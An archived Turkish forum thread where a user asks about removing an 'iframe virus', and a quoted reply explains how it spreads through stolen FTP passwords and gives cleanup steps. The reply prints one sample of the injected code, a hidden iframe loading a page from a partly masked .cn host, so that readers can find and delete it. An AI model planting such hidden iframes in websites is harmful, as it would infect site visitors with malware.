Giriş

Orijinalini görmek için tıklayınız : iframe virüsünü temizleten program var mı ?


NOAH
02-10-2009, 19:44
merhaba arkadaşlar.
iframe virüsü ile başım belada. bir türlü temizleyemedim.
bilgisayarımdaki virüsleri temizleyen program varmı bildiğiniz?

umitweb35
03-10-2009, 13:44
İframe virüsü FTP programınıza kayıtlı şifreleri kullanarak FTP'nize ulaşır. İçerisinde "index", "main", "default" bulunan dosyalarınıza başka bir web sayfasının zararlı kodlarını bulaştırır. Sitenize girenlerede bu virüs bulaşabilir.

Nereden Bulaşır ?

İframe virüsü genellikle virüsün bulunduğu bir sayfa açtığınızda otomatik olarak sizin bilgisayarınıza da yüklenecektir. Bunun haricinde zararlı yazılımlardan crack dosyalarından da kolayca bulaşabilir.

Nasıl Temizlenir ?

1-) Öncelikle FTP programınızı kaldırın. Hatta Program Files Klasöründen komple silin.
2-) Bilgisayarınıza güncel bir antivirüs yükleyin ve virüslü sitelerin hiç birine girmeyin.(kendi siteniz dahil.) Antivirüs programını kesinlikle illegal (crackli vs.) indirmeyin. Aşağıda verdiğim adreslerden 30 günlük deneme sürümlerini indirebilirsiniz.(Yalnızca 1 tane antivirüs kurun.)
Kaspersky Lab Trkiye: Antivirs (http://www.kaspersky.com.tr/)
ESET - Antivirus Software with Spyware and Malware Protection (http://www.nod32.com.tr/)
3-) Sisteminizi komple tarayın. Özellikle işletim sisteminin ve programların bulunduğu klasörleri.
4-) Buradan spybot, Buradan'da s-quared programlarını indirin.Sistemdeki zararlı yazılımları tarayın ve silin.
5-) Sisteminizin temizlendiğine emin olduktan sonra FTP şifrelerinizi değiştirin.
6-) Filezilla FTP programını indirip kurun.
7-) Dosya adında "index" kelimesi bulunan bütün dosyalarınızı bilgisayarınıza indirin.(index.template.php, post.template.php dosyalarınıza da bulaşmış olabilir bütün tema dosyalarınızı indirin (.php ve html uzantılı) ). Bu konuda çok titiz davranmanız gerekli bütün index dosyaları ve tema dosyalarınızda olabilir. Hepsini temizlemeniz gerekli.
8-) Buradan notepad ++ programını indirin. Ctrl+F tuş bileşimini kullanarak arama ekranına geçin. Dosyada bul sekmesine tıklayın. Klasör: yazan bölüme indirdiğiniz dosyaların konumunu belirtin. Aranan: Kısmına iframe yazın. Tümünü bulun. Bulduğunuz kodları silin.(Dikkatli olun ! Hepsi iframe virüsü olmayabilir sonradan eklediğiniz haber vs. kodlar olabilir.)



<iframe src="http://*****ds.cn:8080/index.php" width=126 height=163 style="visibility: hidden"></iframe>

böyle bir kod bulundu. Bu kod her zaman aynı olmayacaktır. Site domaini farklılık gösterebilir.
Bulduğunuz kodu kopyalayın. Yine Ctrl + F ile arama penceresini açın. Değiştir sekmesine geçin. Ara kısmına bulduğunuz kodu yapıştırın. Şununla değiştir kısmını boş bırakın. Bütün açık belgelerde değiştir butonuna tıklayın. Dosyalarda yaptığınız değişiklikleri kaydederek kapatın.
alintidir